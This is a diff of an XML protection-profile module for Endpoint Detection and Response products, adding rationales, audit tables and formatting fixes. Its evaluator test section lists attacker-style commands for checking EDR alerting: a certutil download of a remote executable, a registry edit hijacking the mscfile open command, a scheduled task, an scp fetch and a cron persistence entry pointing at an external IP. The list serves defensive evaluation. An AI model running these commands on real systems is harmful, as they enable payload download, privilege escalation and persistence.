ESMEDR Builder Test 0112

Author: crfrancisco

input/esm-edr.xml

@@ -134,6 +134,15 @@
         PP-Module.
         <figure entity="images/edr_overview.png" title="EDR and Host Agent Communications" id="toe_overview"/>
       </sec:TOE_Boundary>
+      <sec:TOE_Platform>
+        The TOE platform, which consists of the OS or 
+	      Cloud platform on which the EDR software executes,  is outside the scope of evaluation. 
+	      However, the security of the EDR relies upon it.
+        <h:p/>
+        Any
+        communications with trusted remote file reputation or threat intelligence services is
+        relevant to overall EDR system security but is also outside the scope of evaluation.
+      </sec:TOE_Platform>
     </section>
     <sec:Use_Cases>
       Requirements in this PP-Module are designed to address
@@ -218,6 +227,8 @@
           <rationale>The PP-Module includes FMT_SMR.1 to define the management roles that the TSF supports so that its management functions can be separated by role.</rationale>
           <addressed-by>FMT_SRF_EXT.1</addressed-by>
           <rationale>The PP-Module includes FMT_SRF_EXT.1 to define the remediation functions that are available to authorized users to issue corrective actions on a system that has a connected Host Agent.</rationale>
+          <addressed-by>FMT_TRM_EXT.1 (objective)</addressed-by>
+          <rationale>The PP-Module includes FMT_TRM_EXT.1 to provide an optional capability to ensure the integrity of management commands and policies issued to external Host Agents through use of a digital signature.</rationale>
         </threat>
       </threats>
     </sec:Threats>
@@ -229,6 +240,8 @@
           management activities. The OE will provide reliable network connectivity for the EDR to operate.
             The EDR will robustly handle occasional instances when
           connectivity is unavailable or unreliable.</description>
+          <consistency-rationale>This assumption is consistent with the Base-PP because assuming network availability is consistent with the A.PLATFORM
+          assumption defined by the Base-PP, which expects the TOE to have a trustworthy computing platform.</consistency-rationale>
           <objective-refer ref="OE.RELIABLE_TRANSIT">
             <rationale>The OE objective OE.RELIABLE_TRANSIT is realized through
             A.CONNECTIVITY.</rationale>
@@ -251,6 +264,8 @@
         <SOE name="OE.RELIABLE_TRANSIT">
           <description>Wired or wireless network traffic between the EDR and
             host agents will provide reasonably reliable connectivity.</description>
+          <consistency-rationale>This objective relates to an external interface that does not exist in the Base-PP
+          and does not affect Base-PP functionality.</consistency-rationale>
         </SOE>
       </SOEs>
     </section>
@@ -288,6 +303,9 @@ This section describes any modifications that the ST author must make to the Bas
     </base-pp>
     <!-- 5.2 TOE Security Functional Requirements -->
     <man-sfrs>
+      <section id="sec-sel-audit-table" title="Auditable Events for Mandatory SFRs">
+        <audit-table id="at-Man" table="mandatory"/>
+      </section>
       <!-- 5.2.1 Security Audit (FAU) -->
       <section title="Security Audit (FAU)" id="fau-mandatory">
         <ext-comp-def title="Server Alerts" fam-id="FAU_ALT_EXT">
@@ -390,25 +408,10 @@ This section describes any modifications that the ST author must make to the Bas
                 <h:p/>
               </Guidance>
               <Tests>
-                <h:p>The evaluator shall perform the following tests:</h:p>
-                <h:p>
-                  <h:b>For Windows,</h:b>
-                  the evaluator shall test the EDR's ability to detect
-                  anomalous activity by performing the following subtests based on the platform of
-                  the enrolled Host Agent's system, verifying for each that, corresponding alerts
-                  were generated in the management dashboard:
-                </h:p>
-                <h:p>
-                  <h:b>For Linux,</h:b>
-                  the evaluator shall test the EDR's ability to detect
-                  anomalous activity by performing the following subtests based on the platform of
-                  the enrolled Host Agent's system, verifying for each that, corresponding alerts
-                  were generated in the management dashboard:
-                </h:p>
-                <h:p>
-                  <h:b>For all platforms:</h:b>
-                </h:p>
+                The evaluator shall perform the following tests:
                 <testlist>
+                  <h:b>For Windows,</h:b>
+                  the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:
                   <test>The evaluator shall open a Windows command prompt as a user and run the command <h:code>cmd /c certutil -urlcache -split -f &lt;remote file>
                         &lt;download directory></h:code>, where the remote file is a valid file path to an accessible, remotely stored executable, and the download directory is a valid directory path writable by the current local user.</test>
                   <test>The evaluator shall open a Windows command prompt as a user and run the command <h:code>reg.exe add hkcu\software\classes\mscfile\shell\open\command
@@ -417,6 +420,8 @@ This section describes any modifications that the ST author must make to the Bas
                         executable>" /ST &lt;time></h:code>, where the local executable is a valid file path to a readable, local executable, and time is a start time that occurs within minutes of the task being created.</test>
                 </testlist>
                 <testlist>
+                  <h:b>For Linux,</h:b>
+                  the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:
                   <test>The evaluator shall open a terminal and run the command <h:code>scp
                       &lt;remote user>@&lt;remote host>:&lt;remote path>
                       &lt;download directory></h:code>, where the remote user is a valid user on remote host, remote path is a valid path to a remotely stored executable, and the download directory is a valid directory path writable by the current local user. The remote user's password shall be provided when prompted.</test>
@@ -425,6 +430,7 @@ This section describes any modifications that the ST author must make to the Bas
                       /etc/cron.hourly/persist</h:code>, where the outside IP is a valid external address.</test>
                 </testlist>
                 <testlist>
+                  <h:b>For all platforms:</h:b>
                   <test>The evaluator shall review an alert on the management dashboard and verify that the alert contains a severity field and the fields specified in the ST. The evaluator will open or view the alert and verify that a timeline of events is available for review. The timeline shall show a progression of events over time.</test>
                   <test>The evaluator shall pick an alert on the management dashboard and export the alert in every format specified in the ST. The evaluator shall review the operational guidance and the selection from the requirement and verify that export options exist for all the declared formats in the selection. After exporting one alert for each possible format the evaluator shall review the file contents of the exported alert and verify it is the correct format for the selected export option (for example, an export of the IODEF type must contain 'IODEF-Document' in the first element of the exported file).</test>
                 </testlist>
@@ -455,7 +461,7 @@ This section describes any modifications that the ST author must make to the Bas
                 <h:li>Process creation,</h:li>
                 <h:li>Libraries and modules loaded by processes,</h:li>
                 <h:li>Filenames and  <selectables><selectable id="fau_col_ext.1.1_2"><assignable>other metadata</assignable></selectable><selectable id="fau_col_ext.1.1_3">no other metadata</selectable></selectables>  of files created and  <selectables><selectable id="fau_col_ext.1.1_5"><assignable>other activities performed to files</assignable></selectable><selectable id="fau_col_ext.1.1_6">no other activities</selectable></selectables>  on persistent storage,</h:li>
-                <h:li><selectables><selectable id="fau_col_ext.1.1_8"><assignable>other host data</assignable></selectable><selectable id="fau_col_ext.1.1_9">no other host data</selectable></selectables>.</h:li>
+                <h:li> <selectables><selectable id="fau_col_ext.1.1_8"><assignable>other host data</assignable></selectable><selectable id="fau_col_ext.1.1_9">no other host data</selectable></selectables>.</h:li>
               </h:ol>
             </title>
             <note role="application">The intent of this requirement is to specify the minimum set
@@ -700,19 +706,21 @@ This section describes any modifications that the ST author must make to the Bas
           <f-element id="fmt_smf-1-1_ENDPOINT">
             <title>
               The TSF shall be capable of performing the following management functions:
+              <h:br/>
+              <h:br/>
               <h:b>
                 <ctr id="fmt_smf" ctr-type="Table">: Management Functions</ctr>
               </h:b>
-              [Status Markers: M - Mandatory O - Optional or Objective - -
-              Not Applicable]
-              Status Markers:
               <h:br/>
-              O - Indicates that this function is optional for this role
               <h:br/>
-              M - Indicates that this function is mandatory for this role.
+              [Status Markers:
+              <h:br/>
+              M - Mandatory
               <h:br/>
-              NA - Indicates that this function is not applicable for this role
+              O - Optional or Objective
               <h:br/>
+              - -
+              Not Applicable
               <h:br/>
               <management-function-set default="O">
                 <manager cid="A">Administrator</manager>
@@ -782,20 +790,22 @@ This section describes any modifications that the ST author must make to the Bas
             <title>
               The TSF shall be capable of performing the following management functions
               <h:b>that control
-                behavior of the Host Agent</h:b>
-              :[<h:b>
+                behavior of the Host Agent</h:b>:
+              <h:br/>
+              <h:br/>
+              <h:b>
                 <ctr id="fmt_smf" ctr-type="Table">: Management Functions</ctr>
               </h:b>
-              [Status Markers: M - Mandatory O - Optional or Objective - -
-                Not Applicable]
-              Status Markers:
               <h:br/>
-              O - Indicates that this function is optional for this role
               <h:br/>
-              M - Indicates that this function is mandatory for this role.
+              [Status Markers:
               <h:br/>
-              NA - Indicates that this function is not applicable for this role
+              M - Mandatory
               <h:br/>
+              O - Optional or Objective
+              <h:br/>
+              - -
+                Not Applicable
               <h:br/>
               <management-function-set default="O">
                 <manager cid="A">Administrator</manager>
@@ -918,15 +928,16 @@ This section describes any modifications that the ST author must make to the Bas
                 <ctr id="fmt_srf_ext" ctr-type="Table">: Management
                   Functions</ctr>
               </h:b>
-              [Status Markers: M - Mandatory O - Optional or Objective - -
-                Not Applicable]
-              Status Markers:
               <h:br/>
-              O - Indicates that this function is optional for this role
               <h:br/>
-              M - Indicates that this function is mandatory for this role.
+              [Status Markers:
+              <h:br/>
+              M - Mandatory
               <h:br/>
-              NA - Indicates that this function is not applicable for this role
+              O - Optional or Objective
+              <h:br/>
+              - -
+                Not Applicable
               <h:br/>
               <h:br/>
               <management-function-set default="O">
@@ -996,7 +1007,7 @@ This section describes any modifications that the ST author must make to the Bas
             functionality.
           </consistency-rationale>
           <f-element id="fpt_itt-1-1">
-            <title>The <h:b>EDR</h:b> shall<h:b><selectables><selectable id="fpt_itt.1.1_1">implement <selectables><selectable id="itt_tls_from_package">TLS as defined in the TLS Package</selectable><selectable id="https_from_package">HTTPS as defined in the Base-PP</selectable></selectables> </selectable><selectable id="fpt_itt.1.1_2">invoke platform-provided functionality for <selectables><selectable id="itt_invoke_platform_tls">TLS</selectable><selectable id="fpt_itt.1.1_3">HTTPS</selectable></selectables> </selectable></selectables> 
+            <title>The <h:b>EDR</h:b> shall<h:b> <selectables><selectable id="fpt_itt.1.1_1">implement <selectables><selectable id="itt_tls_from_package">TLS as defined in the TLS Package</selectable><selectable id="https_from_package">HTTPS as defined in the Base-PP</selectable></selectables> </selectable><selectable id="fpt_itt.1.1_2">invoke platform-provided functionality for <selectables><selectable id="itt_invoke_platform_tls">TLS</selectable><selectable id="fpt_itt.1.1_3">HTTPS</selectable></selectables> </selectable></selectables> 
                 to</h:b> protect TSF data from [<h:i>modification, disclosure</h:i>] when it is transmitted between separate parts of the TOE. </title>
             <note role="application">
               The intent of the above requirement is to use the
@@ -1064,7 +1075,7 @@ This section describes any modifications that the ST author must make to the Bas
           <f-element id="ftp_trp-1-1">
             <title>
               The TSF shall
-              <h:b><selectables><selectable id="ftp_trp.1.1_1">implement <selectables><selectable id="trp_tls_from_package">TLS as defined in the TLS Package</selectable><selectable id="ITC_HTTPS_2">HTTPS as defined in the Base-PP</selectable></selectables> </selectable><selectable id="ftp_trp.1.1_2">invoke platform-provided functionality for <selectables><selectable id="ftp_invoke_platform_tls">TLS</selectable><selectable id="ftp_trp.1.1_3">HTTPS</selectable></selectables> </selectable></selectables>  to</h:b>
+              <h:b> <selectables><selectable id="ftp_trp.1.1_1">implement <selectables><selectable id="trp_tls_from_package">TLS as defined in the TLS Package</selectable><selectable id="ITC_HTTPS_2">HTTPS as defined in the Base-PP</selectable></selectables> </selectable><selectable id="ftp_trp.1.1_2">invoke platform-provided functionality for <selectables><selectable id="ftp_invoke_platform_tls">TLS</selectable><selectable id="ftp_trp.1.1_3">HTTPS</selectable></selectables> </selectable></selectables>  to</h:b>
               provide a communication path between itself and [<h:i>remote</h:i>]
               <h:b>administrators</h:b>
               that is logically distinct from other communication paths and
@@ -1075,13 +1086,13 @@ This section describes any modifications that the ST author must make to the Bas
           <f-element id="ftp_trp-1-2">
             <title>
               The TSF shall
-              <h:b><selectables><selectable id="ftp_trp.1.2_1">implement functionality</selectable><selectable id="ftp_trp.1.2_2">invoke platform-provided functionality</selectable></selectables>  to</h:b>
+              <h:b> <selectables><selectable id="ftp_trp.1.2_1">implement functionality</selectable><selectable id="ftp_trp.1.2_2">invoke platform-provided functionality</selectable></selectables>  to</h:b>
               permit [<h:i>remote <h:b>administrators</h:b></h:i>] to initiate communication via the
                 trusted path.
             </title>
           </f-element>
           <f-element id="ftp_trp-1-3">
-            <title>The TSF shall<h:b><selectables><selectable id="ftp_trp.1.3_1">implement functionality</selectable><selectable id="ftp_trp.1.3_2">invoke platform-provided functionality</selectable></selectables>  to </h:b>require the use of the trusted path for [<h:i>all remote
+            <title>The TSF shall<h:b> <selectables><selectable id="ftp_trp.1.3_1">implement functionality</selectable><selectable id="ftp_trp.1.3_2">invoke platform-provided functionality</selectable></selectables>  to </h:b>require the use of the trusted path for [<h:i>all remote
                 administration actions</h:i>].</title>
             <note role="application">This requirement ensures that authorized remote
                 administrators initiate all communication with the EDR via a
@@ -1126,6 +1137,9 @@ This section describes any modifications that the ST author must make to the Bas
     <opt-sfrs/>
     <sel-sfrs/>
     <obj-sfrs>
+      <section id="sec-obj-audit-table" title="Auditable Events for Objective SFRs">
+        <audit-table id="at-objective" table="objective"/>
+      </section>
       <!-- 5.2.6 Security Management (FMT) -->
       <section title="Security Management (FMT)" id="fmt-objective">
         <ext-comp-def title="Trusted Remediation Functions" fam-id="FMT_TRM_EXT">